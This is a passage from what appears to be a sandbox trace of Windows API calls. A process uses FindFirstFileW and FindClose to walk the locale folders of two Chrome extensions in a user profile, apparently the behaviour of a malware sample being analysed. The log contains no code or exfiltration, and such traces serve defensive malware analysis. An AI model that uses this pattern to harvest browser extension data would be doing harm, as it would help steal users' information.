0xa32d28 [0157.475] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.475] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.475] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.475] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.475] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.475] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.475] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.475] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.476] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.476] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.476] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.476] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.476] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.476] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.476] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.476] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.477] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.477] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.477] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.477] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.477] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.477] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.477] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.477] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.478] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.478] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.478] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.478] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.478] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.478] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.478] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.478] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.478] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.479] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.479] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.479] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.479] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.479] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.479] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.479] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.479] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.480] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.480] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.480] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.480] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.480] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.480] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.480] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.480] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.481] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.481] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.481] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.481] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.481] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.481] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.481] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.481] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.482] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.482] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.482] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.482] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.482] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.482] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.482] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.482] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.482] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.483] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.495] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.495] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.495] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.495] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.495] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.496] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.496] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.496] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.496] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.496] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.496] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.496] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.496] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.496] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.497] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.497] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.497] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.497] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.497] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.497] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.497] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.498] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.498] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.498] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.498] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.498] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.498] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.499] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.499] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.499] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.499] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.499] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.499] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.499] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.499] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0157.499] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0157.500] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\*", lpFindFileData=0x253ddf8 | out: lpFindFileData=0x253ddf8) returned 0xa32da8 [0157.500] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0157.500] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0157.500] FindClose (in: hFindFile=0xa32c68 | out: hFindFile=0xa32c68) returned 1 [0157.500] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33c00d0 | out: hHeap=0x20f0000) returned 1 [0157.500] FindClose (in: hFindFile=0xa32ca8 | out: hFindFile=0xa32ca8) returned 1 [0157.500] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33b00c8 | out: hHeap=0x20f0000) returned 1 [0157.500] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\*", lpFindFileData=0x253e300 | out: lpFindFileData=0x253e300) returned 0xa32ca8 [0157.500] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\*", lpFindFileData=0x253e07c | out: lpFindFileData=0x253e07c) returned 0xa32c68 [0157.501] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\*", lpFindFileData=0x253ddf8 | out: lpFindFileData=0x253ddf8) returned 0xa32da8 [0157.501] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.501] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.501] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.501] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.501] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.501] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.501] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.502] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.502] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.502] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.502] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.502] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.502] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.502] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.502] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.503] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.503] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.503] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.503] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.503] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.503] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.503] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.504] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.504] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.504] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.504] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.504] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.504] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.504] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.505] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.505] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.505] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.505] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.505] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.510] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.510] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.510] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.510] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.512] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.512] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\*", 